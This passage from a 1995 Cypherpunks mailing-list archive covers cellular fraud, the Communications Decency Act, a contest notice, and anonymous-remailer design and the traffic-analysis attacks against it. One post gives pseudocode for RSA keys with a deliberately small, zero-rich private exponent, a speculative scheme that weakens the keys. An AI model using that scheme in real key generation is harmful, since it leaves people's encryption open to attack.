skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
                 Be careful when playing under the anvil tree.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLzmurMlnXxBRSgfNAQEN/wf9EXER7hq44OeA0mL5QH1S+Px4tV1xlLE+
3DGItShAqwgHfQLxcD4oceIk6ZK1pYCytK7dnKeGNRynKKPoxDyFzAjLnI6xptMr
F72Uonzx/jhtodP7a+N0S3I7f4Hz362E0Wuplw0EItD3NaXEItaqyc7UXnZTXx61
/ER9/w0Pt9Fg56ULXNyp707xzfyeXeynQo51Rnox6/lL21T381KmzpS4npRUF9q4
XyifQYVeG23UHCujsHK6lbKFNVUZJYvaNZC7nSYJntb+rCSNAp983GUoUSPC7x7h
Vp/XfSVttZNVfmUUAtLnN5TYqR3uCUEJOzTam8LzxQi8m0VROTBagg==
=KoNH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@netcom.com (Allen B. Ethridge)
Date: Wed, 8 Feb 95 21:19:02 PST
To: cypherpunks@toad.com
Subject: Re: The drumbeat against anonymity continues....
Message-ID: <ab5f548601021004d020@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Late night, off the top of my head, so no quotes, please.

Tim May wrote:
>
>
>The real "drumbeat" article is about cellular phone fraud and
>toll-free number fraud. Actaully, a couple of related articles.
>(Everyone should at least skim "RISKS.")
>
>Anonymity is cited as a problem. But this misses the point, that the
>real problem is lack of a proper payment model. As David Chaum points
>out, there are really only two basic payment approaches: transfer of
>something of value or an account-based transfer. Cash or barter are
>examples of the first, checks or credit card payments are examples of
>the second (though each has some wrinkles). Digital cash, when online
>cleared, behaves mostly like real cash.
>
>The phone companies that are complaining about fraud have inadequately
>arranged for security and need to adopt a mode that fixes this. Since
>physical money can't be fed into the slots of a handheld cell phone (or
>at least can't then be delivered to the service owner!), the solution
>has traditionally been an account-based payment system. (Accounts can
>also be better protected against fraud by having PINs, etc.)
>

The technology to reduce cellular fraud, through encryption and
authentication, is easily implementable, but for some reason neither
the operating companies nor the manufacturers want it.

In contrast, European cellular (GSM) products do implement
encryption and authentication (at least as far as laws allow).
GSM mobile phones can be equipped with a slot for a card that
identifies the subscriber.  Billing is based on the subscriber's
identity, not the phone's.

I'd say that the problem isn't just a lack of a proper payment
model, but also an unwillingness to provide adequate technology
to the problem.  Of course, the GSM approach does nothing for anonymity
or digital cash.

allen@well.sf.ca.us          It's dangerous, child, to come to conclusions
ethridge@netcom.com          when you don't have any facts.
my opinions are my own       Dr. Hemlock, The Eiger Sanction






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 8 Feb 95 22:06:51 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.3.89.9502081135.A7848-0100000@netcom10>
Message-ID: <PiQElKjqRmN1078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <Pine.3.89.9502081135.A7848-0100000@netcom10>, you wrote:
> On Tue, 7 Feb 1995, Samuel Kaplin wrote:
> > I find it amazing that CPR and EFF
> > haven't picked this up yet.
>
> Really?

I had at least hoped that they would have their ear to the ground.
Unfortunately I was wrong. ;(


- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
  "A survey is being made of this":  We need more time to think of an answer.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLzmux8lnXxBRSgfNAQFDMwf/WrbC5T+GG7HB9TfTqJGbucaqlZO7rIVe
R+xIYnG2feHT5vR43UpkpEVELLaMuiZBrQgEmBRY7U5EQcNqJQKcOZlZ4rUeFW29
ZMJtBFxmzx0SfRlx4YBMxNMnmFqlisXZuMzEoZbW5S+phskOeOMGbC/TtrIh1cJO
wNPa2CcpS71xr4P1nWvC2yJevsbcDz49zwPwNxMibKHTz8AgskCKGwbhH1D8nanc
z4Jl6g0bk9DkzQZgiU91FHfRLwmuvzhWa8hN0x6wNxzdt5GFCPR+Ju+i8silhw+u
IlJP61Cn3W+wGkpRXniYhXn8chBwfNvPIKUABMtylQPRRvDB6BCVPw==
=icAg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Wed, 8 Feb 95 21:08:42 PST
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <9502082149.AA28226@tis.com>
Message-ID: <Pine.LNX.3.91.950209000839.7928B-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Carl Ellison wrote:

> >From: jpp@markv.com
> 
> >of the very most important rights.  To hold the owner of a buliten
> >board responsible for the illegal messages posted to it, is to force
> >the buliten board owner to become a government censor in all but name
> >(and wages).
> 
> anyone heard of "no unfunded mandates" ?

This is one of my favorite pet arguments in this case. With the no 
unfunded mandates notion in the air for the States, why can't sysops 
demand the same treatment, given the resources that would have to be 
devoted to tracking content on their sysytems.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Wed, 8 Feb 95 22:17:25 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: S314 and potential hell-raising
In-Reply-To: <sDQElKjqRO9A078yn@mirage.skypoint.com>
Message-ID: <199502090612.AAA03687@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> I just got a reply from Stanton M. from EFF today. To paraphrase, "No we're
> not in favor of it and we're working on a response."
>
What other kind of responce other than no compromise should be entertained?

                                                Ravage
                                                 A
                                                  Konfused
                                                   Xfrmr
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Wed, 8 Feb 95 22:35:05 PST
To: cypherpunks@toad.com
Subject: Re: S314 and potential hell-raising
Message-ID: <v01510134ab5f5a5a36be@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


>What other kind of responce other than no compromise should be entertained?

Very much agreed. In this type of situation there is no room for compromise.
If we compromise, we lose, thus my earlier snipy comment about EFF. They compromised and lost. We cannot do this now, we must win this or it starts going downhill from here.

_____________________________________                  
{-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-}
{-:      www server: http://josaiah.sewanee.edu/         :-}
{-: Finger 'jme@josaiah.sewanee.edu' for my Public :-}
                                        PGP block.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Wed, 8 Feb 95 22:30:35 PST
Subject: Re: S314 and potential hell-raising
In-Reply-To: <5QQElKjqRmxA078yn@mirage.skypoint.com>
Message-ID: <Pine.LNX.3.91.950209013119.8049A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Samuel Kaplin wrote:

> There are going to be a lot of factions involved with this one. Some
> desirable, some not. (I leave it up to the individual to make the
> judgment) Maybe we can learn something from the military and apply c3
> (Command, Control and Communications) to this. Set up a forum for
> coordinating efforts, delegate tasks, most important communicate so we
> don't waste resources on redundant efforts. The religious right has
> successfully been doing this for years. Perhaps a dose of their own medicine
> is in order. Anyone care to create a newsgroup? ;)

It's coming, soon. Keep your eyes peeled for an announcement.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Network Security Observations <NSO@delphi.com>
Date: Wed, 8 Feb 95 23:38:21 PST
To: cypherpunks@toad.com
Subject: NSO Challenge 95 Nr. 1
Message-ID: <01HMTVLQZ2MW90GONH@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


***********************************
Network Security Observations
Challenge Nr. 1995-001
February 8, 1995
***********************************

Network Security Observations
invites the international research
community to produce a detailed
presentation on the following subject:

> Establishment, authentication, and
verification of a relationship and
untraceability of undeniable secret
transactions <


             Conditions
- Party A (Alice)
- Party B-n (Bob)
- A multitude of Bobs know who Alice is
- Alice - being only one party - does not
personally know who the Bobs are
- It is the desire of Alice to transact
- Bob - only producing a certain proof -
remains further a static party
- At one given time Alice established a
relationship with Bob-n
- Further, from time to time Alice wants
to check this relationship with Bob-n
- Alice may utilize the verification
process only for this purpose
- At a given point Alice might want to
terminate her relationship with Bob-n, or
vice versa

- It is essential that the relationship
between Alice and Bob-n is set up so that
Bob can prove to Alice that he is the
legitimate Bob, but, in such a way that
his real identity remains secret for Alice
- Alice can only use this procedure to
verify Bobs legitimacy
- Alice may only verify, but not register
- Alice may have the option to repeatedly
challenge Bob s legitimacy, but the
conditions under which these separate
verification checks take place may not be
registered as well
- Alice now wants that Bob can undeniably
prove to her that he is who he says he is,
by untraceable number verification, thus
without actually knowing the real identity
of Bob, and without the ability to utilize
the verification process for any other
purpose

The presentation should include the full
theoretical processes, applying known
cryptographic algorithms, the theories of
undeniable untraceable number verification
and secret transactions as developed by
Dr. David Chaum (see proceedings Crypto,
Eurocrypt, etc.), and envision a practical
applicability in a real world environment.

The presentations will be judged by a team
of seven international experts of senior
academic/research level.

The best presentation will receive
international acclaim (including, but not
limited to TV)  and a (secret)
financial reward of substance.

It is essential to register, (name,
surface mail address information,
affiliation, email address, p-pgp key
(optional)). One should do so by sending
an email message with this information to:
nso@delphi.com

Upon registration a notification and
detailed instructions will be mailed to
the individual who registers by surface
mail/airmail.

There is no limitation as to origin,
nationality, position, or seniority of the
researcher(s).

The presentation may be made by more than
one researcher, but a lead-researcher must
be registered. Co-researchers will share
equally in the benefits, allowing for one
extra share for the lead-researcher. 

There is no set maximum number of pages for
the presentation, though an extended abstract 
must be at least 15 pages, while the full paper
must be at least 25 pages in length.

The lead-researcher and at least two co-
researchers (if any) must be prepared to
present the efforts in person during an
international conference.

Commercial entities/companies may not participate.
Employees of commercial entities/companies may
participate individually, but must testify that their
employer shall have no benefit of their efforts.

To allow for proper preparation the
deadlines are as follows:

1. registration with NSO: ends on March 1,
1995.
2. proposed presentations (extended
abstracts) should be received by NSO on or
before August 31, 1995.
3. final presentations must be received by
NSO on or before November 30, 1995.

The presentation selection/review process
takes place in three rounds:
- first selection of the extended
abstracts
- correction selection of first round
passed
- final selection of remaining passed

More details will be available in the next
issue of Internet Security Monthly and the
next supplement of Network Security
Observations.

|    Network Security Observations  -  Internet Security Monthly
|    International Research Journals on 
|    Datacommunications and Network Security 
|    Suite 400, 1825 I Street NW, Washington DC 20006
|                                 United States 
|    Telephone +1 202 775 4947  -   Fax +1 202 429 9574 
|                  Internet:  nso@delphi.com   
                  ----------------------X----------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:03:10 PST
To: cypherpunks@toad.com
Subject: Crusade's End
Message-ID: <Pine.3.89.9502090532.A21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed Feb  1 20:35:31 1995
From: Rick Busdiecker <rfb@lehman.com>
 
        Date: Wed, 1 Feb 1995 18:59:54 -0600 (CST)
        From: Nathan Zook <nzook@bga.com>
    
        Instead of routing all of those messages to /dev/null, forward
        them back to the authors, perhaps with a notice that the message
        appears to have been mistakenly routed to you?
 
    And then all LD has to do to have lots-o-fun is to send you a whole
    bunch of "your OS sucks" messages with the From: line set to
    alt.religion.scientology@some.mail2news.site . . . .
 
    			Rick
 
Presumably, this sort of censure would occur very rapidly.  The script had
specific from/to lines it was looking for.  Neat idea, though.
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:03:49 PST
To: cypherpunks@toad.com
Subject: Lucky primes--third time's the charm?
Message-ID: <Pine.3.89.9502090512.B21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
The algorithm I posted the second time works, (nice improvement, eh?) but
is likely to take several thousand years to complete.  And when it does, we
can expect weak primes.  The enhancement I propose should fix that.
 
 
As I recall, PGP uses 0x10001 for its e.  It does so in order to be able to
easily determine that e is a primitive root of unity in Fp.  Since we are
assuming that the p we actually work with is prime, we have: n^p = n mod p
ie: n^((p-1)*i+1) = n mod p.  So we want ed = (p-1)*i+1, ie: 
((ed-1)/i)+1 = p.
 
Let 2*x be the target number of bits in the modulous.  We then look for two
primes with approximately x digits such than d (for each prime in turn) is
small.  We know that ed = (p-1)*i+1, so we search for small i's that work.
d = ((p-1)*i+1)/e, so for a given p, d will be small iff i is small.
 
But in general, the calculation to invert e is long.  We therefore fix ed--
that is our n1--and hope for a small i that works.  If none work, we
increment d and try again.
 
Once we have a p that gives us a small d, we then count the 0's in d,
hoping for a high count.  If we don't get it, we increment d.
 
***
 
That is what my previous algorithm did.  Of course, we can expect a halt
exactly when d ends with a bunch of 0's, followed by a few spare bits.
B-A-D bad.
 
The solution, though, is easy: pick a random high-0 d.  Multiply it by
0x10001 to get ed, and search for small i's.  If you fail, increment d.
Doing so won't affect the number of 0's in d by much, and we expect a prime
fast enough that cumlatives won't be a problem, either.
 
***
Let 2*x be the target number of bits in the modulous.
GetPrime twice.
 
GetPrime:
Let d be a large random number with x-15 bits.
 
If d has too many 1's, pick digits at random and 0 them until d is
sufficiently 0-rich.  This would include room for extra 1s to appear as d
is incremented.
 
Let n1 = d * 0x10001
Let t2 be n1 mod 8, t3 be n1 mod 9, t5 be n1 mod 25, t7 be n1 mod 49.
 
Loop:
For i = 2 to 7
 If n1 = 1 mod i and (n1-1)/i + 1 is not a multiple of {2,3,5,7}
/* This can be done very fast, and eliminates most canidates. */
 
    If (n1-1)/i + 1  is prime, record and exit Loop.
/* This would be the long test in RSAREF, or Miller-Rabin. */
 
    EndIf
 EndIf
Next
d++
n1 += 0x10001
EndLoop
EndGetPrime
 
By keeping track of various quantities, we can eliminate all multiprecision
divisions except for the original one needed to get the t's and the first
n1/i's, and doing increments instead.
 
Nathan
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLzmnanmgMs8UcStNAQECpQf6Ag8PUhiHySvv/lK8dIsmJhknKCuDR0Fi
dVT0oVnTijmz1mdX0a6tlhnXyrj+oO4sYLCsej03e+685HZSd5orCYMsMXI/12SU
f8PUVbKK7g/tDFYFah0se7cFL4kvQXwnOYDdzmfVnguW82QDDuS0iSssG42mqUKD
e0QH1jZKxMK+usRF53P0Bui7goNfk7MkN2hI/ShMQggywcDQHYRX/d3QHkhZp6iG
P7rJrW2aRxHYQT9MtiSpOv64Ae1JvmJk4DLXYMhXOSQet8xntRTnm4FIoVStBRmb
dTnOj0d//dHyYWWEVKKFz0GoepnglxjQ0/k3PAKvVgPV5DWzn3xFJQ==
=PzTo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:03:10 PST
To: cypherpunks@toad.com
Subject: Frothing remailers - an immodest proposal
Message-ID: <Pine.3.89.9502090523.D21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
kevin@elvis.wicat.com:
 
>Be gentle, though - it's my first time.
 
Here?  You jest.  ;)
 
>It seems to me that the current remailer web suffers a fundamental flaw.
>It is simply too static. When a remailer disappears, service is
>disrupted and messages are lost. Humans have to statically route their
>messages through the web either by hand or using relatively primitive
>tools such as the chain script (not to belittle the useful work that has
>been done, but it is by no means idiot proof yet). Basically, the
>current web of mailers shows nothing of the dynamic nature that has kept
>the internet alive and has offered us a decent chance at truly anonymous
>communications, nor is it easy to use to its full potential.
>
>Consider a more dynamic web of remailers. I envision remailers that
>actively advertise their presence on the web so that all active
>remailers are aware of all other active remailers. This advertising is
>to have very low latency so that a new mailer can be known to the web
>within minutes (I will address the implementation of this later). Thus,
>remailers can constantly be appearing and disappearing without impact on
>the web as a whole (I refer to this dynamic web of remailers as a
>"froth"). Imagine also that remailers are allowed to dynamically perform
>the routing functions that are currently done statically offline (for
>reasons I will discuss shortly).
>
 
Some version of this discussion came up a few months ago, and I passed on
it then, but I think I've heard enough to comment now:
 
The remailers are based on an inherently different model than the InterNet.
Some of these differences, in fact, are crucial.
 
1) The InterNet is based on mutual cooperation/mutual trust.  Cypherpunks
   trust no one that they don't have to.
 
This is not just a result of our twisted psyche.  If we could trust
everyone, we wouldn't _need_ remailers.  Since we don't even know who is
whom out there, we avoid extending trust.
 
2) The InterNet is concerned first about reliability, and not at all about
   privacy.  The remailers are concerned first about privacy, and can leave
   reliability to the users, if need be.
 
There is nothing to prevent Alice and Bob agreeing to send each other ACK
statements, and retransmitting messages if they don't get the ACK.  There
has been some mention of remailers doing the same with each other, in an
attempt to improve net-wide reliability.  BTW, with T1, sending ACKs is not
unreasonable between remailers.
 
3)  From 1) and 2).  The remailers are heading towards mandatory PGP,
    possibly nested.  All InterNet messages are world-readable--although
    this may be changing as the model breaks down.
 
Again, this has to do with the intrinsic diffences.
 
>The use of such transient routers implies allowing dynamic routing. If
>any given remailer may go down or move at any point, it is impractical
>to expect users to keep track of which are up at the moment and create
>static routes in the current manner. The only reasonable solution I have
>come up with is to allow the remailers themselves to choose routing,
>given that they have full knowledge of the current state of the froth.
 
Here we have the real head of the problem, as Hal so asutely points out:
in your model, if the first remailer is bad, the message is compromised.
If user encrypt to all remailers, they might as well encrypt directly to
mole@snakeoil.nsa.gov.  If they don't, they severly limit who can pick out
their messages.  In particular, they bypass transient remailers.
 
But that isn't all.  If the remailers pick the route, they are in a no
better state than the users.  Since the flushing attack requires remailers
to operate on ticks, with carryover, an hour delay per remailer is almost
minimal, untill traffic really picks up.  So if some message routes through
four remailers, a minimum of four hour delay results.  In your case, this
could easily move between in/out of service modes.
 
 
>                 Think about the proposed extension to MixMaster to
>allow separate parts of a multi-part message to be routed separately,
>and consider whether you really want to have to do this by hand. I
>strongly suspect that most messages are currently routed via boilerplate
>scripts, which has to make the job of traffic analysis much easier for
>our good friend Eve.
 
Stupid is as stupid does.
 
 
>By the way, a brief rant on a related topic; people speak of not
>trusting remailers any further than necessary, while I am clearly
>suggesting granting more authority and trust to the remailers. This
>notion of not assigning trust is simply nonsense. When you send a piece
>of mail to a remailer, encrypted or not, you are assigning complete
>trust in that remailer to keep you anonymous and not to forward your
>mail to the NSA immediately.
 
NOT TRUE.  With proper use of encryption, you are trusting your first
remailer only to not reveal that you sent a message, and not to correlate
that message to the one it sends out.  With rational use of garbage running
two deep, you can even suffer this loss without significant harm.
 
 
>This does lead to a related problem, however; if we allow remailers to
>pop up at random and join in the froth, how do we know that Deitweiller
>won't set up a number of black hole remailers that take your mail and
>throw it away, disrupting the froth, or forward it to nphard@nsa.gov?
 
How indeed?  The reason we chain is because we _don't_ really trust our
first remailer--or any other.
 
>Fortunately, we already have the PGP web of trust model in place and can
>use it to good effect in this case. Remailers should simply not route
>mail through any remailer whose public key is not trusted unless
>explicitly ordered otherwise. This requires remailer operators to
>cooperate to some extent to validate one another's remailer keys, but
>does confer the great advantage of portable remailers as mentioned
>above; if I run a trusted remailer on one machine, I can move it to
>another machine, and as soon as I advertise the new address and the PGP
>public key, it is a trusted and useful part of the froth.
 
Actually, there may be something here.  I don't know about you all, but my
PGP isn't very happy about all these new remailer keys.  We could agree to
the following standard:  Signing a remailers' key means that you believe
the remailer to be secure.  Trusting a remailer key means trusting the
remailer operator to validate other remailer's security.  This adds a whole
new meaning to the phrase, "key compromise certificate".
 
 
>While we are advertising a PGP key and internet address, we might as
>well incorporate other useful information. For instance, remailers could
>advertise their maximum latency. 
 
While I agree that it is useful to post the operating characteristics of
the remailers, the maximum latency must theoretically be infinite in the
standard model to prevent flushing attacks.
 
>    Kevin
 
 
 
Hal <hfinney@shell.portal.com>:
 
 
>I do like Kevin's ideas about a dynamic remailer net, but I think
>another approach would put more smarts into the client program used by
>the originator.  
 
Hear ye, hear ye!  And along those lines...
 
I'm scetchy (at best) by what is meant by "pinging" a remailer.  Would it
not be possible for live-on-the-net remailers to accept a (socket?) quick
check to see if they are online?  If so, then the ping would only work if
the remailer was active when tried.  Furthermore, client software could
startup by sending out these pings, and presenting only responding
remailers to the user--with an exception list for those not "live".
 
Nathan

P.S.:  Late breaking weakness:
Pinging a group of remailers is strong evidence that you are about to 
send a message.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:03:19 PST
To: cypherpunks@toad.com
Subject: re: Remailer Encryption Module
Message-ID: <Pine.3.89.9502090612.E21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: eric@remailer.net (Eric Hughes)
      From: Nathan Zook <nzook@bga.com>
 
      I also believe that hacking PGP is a bad thing (tm), because it 
means that
      every time an upgrade comes out, it will need to be re-hacked, and 
once you
      start hacking, when do you stop?
 
   I agree.  PGP just does not have the support for the encryption
   required for mixing remailers.  These deficiencies have been known for
   about two years at this point and still nothing has happened.  I
   expect this not to change anytime soon.
 
   That means that we have to replace PGP as the encryption module for
   remailers.  The first thing to do is to design a data format which
   supports what the remailers need now, and nothing speculative.  Since
   this data format has a single purpose, we can make new revisions more
   easily than for a general purpose package.
 
   Once we get a data format, implementations will follow.
 
   Eric
 
As I've considered this problem, I've arrived at essentially the same
conclusion.  We need an RSA-IDEA package that does something very close to
Mixmaster.  The only caveat is that we _must_ retain compatibility between
signature formats, even though, as I've suggested, a signature on a
remailer's key might mean something different than a signature on an
individual key.
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:03:20 PST
To: cypherpunks@toad.com
Subject: IQ & such
Message-ID: <Pine.3.89.9502090646.F21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


For what it's worth, I have a tested IQ of 151.  While I am capable of
being trained to perform certain feats quite rapidly via methods that
"average" people don't understand, this is a far cry from the 30-point
never-can-be-explained claim made earlier.  There is one task that I have
observed an intuitive bonus on, but I have _never_ been unable to explain
the methods used to anyone that expressed intrest.
 
I once multiplied two 45 (decimal) digit numbers with no intermediate work
on a challenge.  I claim that my methods could be explained with no trouble
to almost anyone who can multiply two two digit number--I believe that they
are essentially the standard ones for multiprecision multiplication.
 
Nathan
 
A reasoning machine, in the shape of a man, but with no conscious, is not
truly human.
--paraphrase from a letter to the Editor in a Mensa publication





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:05:18 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <Pine.3.89.9502090621.G21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
I was finally able to read Lance's stuff.  Great work!  Ironically, I
arrived at the conclusion that his methods are necessary just before
downloading my mail (including his stuff).  With that in mind, I have now a
new DRAFT:  model.  I anticapate continued discussions on this matters
mostly under that topic.  Also, could you send me a copy of Chaum's paper?
I don't have metamail, but I can convert GIFs, if you could send it PGP -a.
Thanks!!!!!!!
 
 
> From: Nathan Zook <nzook@bga.com>
> [ Re: remailers checking signatures on incoming messages ]
> > What benefit does Alice gain?
> > 1) Plausible deniability.  Remember, "reasonable doubt."  Remember Abscam?
> >    The gov't is in a good position to fake source info.  This squishes
> >    that.  (It squishes even better if Chaum _requires_ signatures.)
> 
> She doesn't get that.  A signature lets her prove that she sent a
> message.  It doesn't let her prove she didn't send a message.
> 
 
If Chaum only accepts validly signed packets, she can.  (Or at a minimum,
the government must demonstrate that she compromised these other keys.)
 
 
> > 2) If Chaum sends Alice a copy of the message that failed the signature
> >    check, Alice knows that someone is trying to spoof her.  This
> >    information may be critical in determining how serious her opponents
> >    are.
> 
> I don't really understand this threat that Alice may be "spoofed".  Why,
> of all places, would her opponents try to spoof her through an anonymous
> remailer?  Isn't this kind of like sending mail with no return address,
> and pretending it comes from someone else?  This seems terribly subtle.
> 
 
It's called "faking evidence".  It's a real problem, especially if you are a
religious nut with guns.  Or just a nut with guns.  If the government knows
you are using the remailers, and wants to establish that you are using them
to conspire, this is the only way to fake evidence.
 
 
As for hacking PGP, I am convinced that the mixmaster-type remailers
require their own package.  Coming soon.
 
 
> I can see the problem with standard packets in a chaining context, that
> they would shrink slightly in size as each successive remailer stripped
> off its envelope.  Re-encrypting would solve this by providing more
> padding.  OTOH you can actually stick padding into a PGP packet if you
> know what you're doing.  I have a perl script around somewhere which will
> do this.
> 
 
But padding is worthless if Eve runs some of the remailers.  I know I just
changed the threat model, but stay tuned...
 
 
> > The most obvious one: Eve checks messages (in vs out) for matching tails.
> > If the tails match, the messages match.  The only way around this is for
> > the entire message to be wrapped.  Thus, the extropian requirement.  
> 
> It is true that encrypting messages intra-remailer would prevent this
> attack as far as that one remailer in the chain is concerned.  But it
> seems to me that the message still suffers from this attack against the
> remailer network as a whole.  This points up the fundamental problem with
> this form of encrypted reply block.  They are really not secure unless
> the body itself gets transformed at each step as in Chaum's model.
> 
 
This attack fails if the last link encrypts on the way out, since the
session key changes.  Bob still gets the dupe message, Eve gets no info.
There may be another way to handle dupe messages, stay tuned...
 
 
> > When I say that the Mark I remailers are laughably easy to crack, I mean
> > laughably easy.
> 
> None of this is news.  
 
Then why did you say, "Let's not start rumors..."?
 
 
> > Get stuck?  Need a hint?  Resend a message.  Watch for the repeat on the
> > out.
> That's why Chaum identified one of the main features of a remailer being
> that it would reject duplicates.  Mixmaster does some version of this,
> although that needs improvement to really meet this attack.
> 
 
Not if Chaum encrypts to Bob.  Chaum encrypting to Bob pushes Eve back to
Wei Dai's work.
 
 
> > Alice has been hauled into court.  The Feds claim that she is the one that
> > actually sent messages M1,...Mx to Bob through Chaum, even though these
> > messages have varied From: (and From) lines.  As root, she cannot claim
> > that this is not possible.  OTOH, if Chaum requires a match, the Feds would
> > have to claim that she compromised the secret keys of all of all the
> > cooresponding From: addresses.  Much tougher.
> 
> OTOH, if Alice actually has signed those messages, her jig is up pretty
> good, wouldn't you say?  Do we really want to force people to use the
> nets in a mode in which they can be incriminated like this by a hostile
> government?
> 
 
I suppose that depends on the threat model.  If the gov't has control of
all the remailers, she's toast, except for being able to claim that the
message was forged.  Here, she loses.  In all other models, the gov't gains
only the proof that she used the remailer net.  In and of itself suspicious
(some places and times), but presumably _not_ a hanging offense.
 
 
> > Seriously, if a sight is being shadowed, then it is insecure.  It is to our
> > advantage to know this.  You are right that we "don't care" where a message
> > comes from only if we assume that the message _didn't_ come from an LEA.
> > (Or a big corporation.  Some of them probably have the power to do this,
> > too.)
> 
> Hell, Detweiler has the power to do this!  He's spoofed messages plenty
> of times.  How do we know?  Because of remailer logging.  That's the real
> threat, IMO (the logging).
> 
 
I mean the power to spoof a remailer, in the sense of processing messages
for it, possibly altering them.  I admit, with intra-remailer encryption,
this is equivalent to compromising the key.  
 
 
> > If it did, then the remailer net is under attack, and we most
> > definitely _do_ care about that.
> 
> Even if a message comes from a fake address that is hardly evidence of an
> attack by a powerful opponent.  It could just be an extra-paranoid
> legitimate remailer user who doesn't want to extend any more trust than
> necessary.
> 
 
Yes, but...  If the address faked is nzook@bga.com, then I have something
to be upset about, no?
 
 
> I meant to refer to encrypted messages identical in size and otherwise
> opaque, so that your apparent rate of output is constant.
> 
 
Okay, but in practice we need a lot of garbage.
 
 
> > >Do you see your suggestion as protecting against Wei's in/out correlation
> > >attack?  
> >  
> > Yes!  Well, not by itself.  My suggestions about "rational use of garbage"
> > do that.  If Bob recieves x messages each tick, 0 to x of which are real,
> > Eve is hosed--if all messages are standard sized & encrypted!.  Eve is even
> > more hosed if the x messages are concatenated & superencrypted.  If Alice
> > sends y messages each tick, Eve is hosed.  Even more so if the messages are
> > concatenated & superencrypted.
> 
> How can Bob arrange to receive a constant number of messages each tick?
 
Every remailer knows to send Bob x messages per tick.  It's right after his
PGP key in the database.
 
 
> Do all his messages come from one remailer?  Or do all of the remailers
> which might send to him check among themselves before sending to him so
> they can mutually know how many fake messages to send?
> 
 
Each remailer does its own work.  The sum of equals is equal.
 
 
> IMO the real solution to the correlation attack is to have a constant
> message generation rate.  That is sufficient.  Solutions to the other
> attacks mentioned in Chaum are described in Chaum.  (This attack was not
> described in Chaum's paper.)
> 
 
But the correlation attack might mean more than just A sending to B.  It
could be B recieves message, then commits act X.
 
 
> > >Of course it was Chaum himself in his 1981 paper (which I think is available
> > >from the CP FTP site) who described the duplicate-message attack.  I don't
> > >see that inter-remailing encryption helps much, because the attacker can
> > >still notice that whenever they inject message A, _something_ goes to
> > >Bob.  The real solution, as Chaum pointed out, is that the remailer must
> > >reject duplicate messages, even when separated by days.  Doing this without
> > >keeping a database of all messages ever sent is left as an exercise.
> > >
> >  
> > I disagree.  If identical input to Chaum does not produce identical output
> > to Bob, how does Eve coorelate them?  Repeating, she can match the top of
> > the body of messages, so random tails reveal the actual encrypted message,
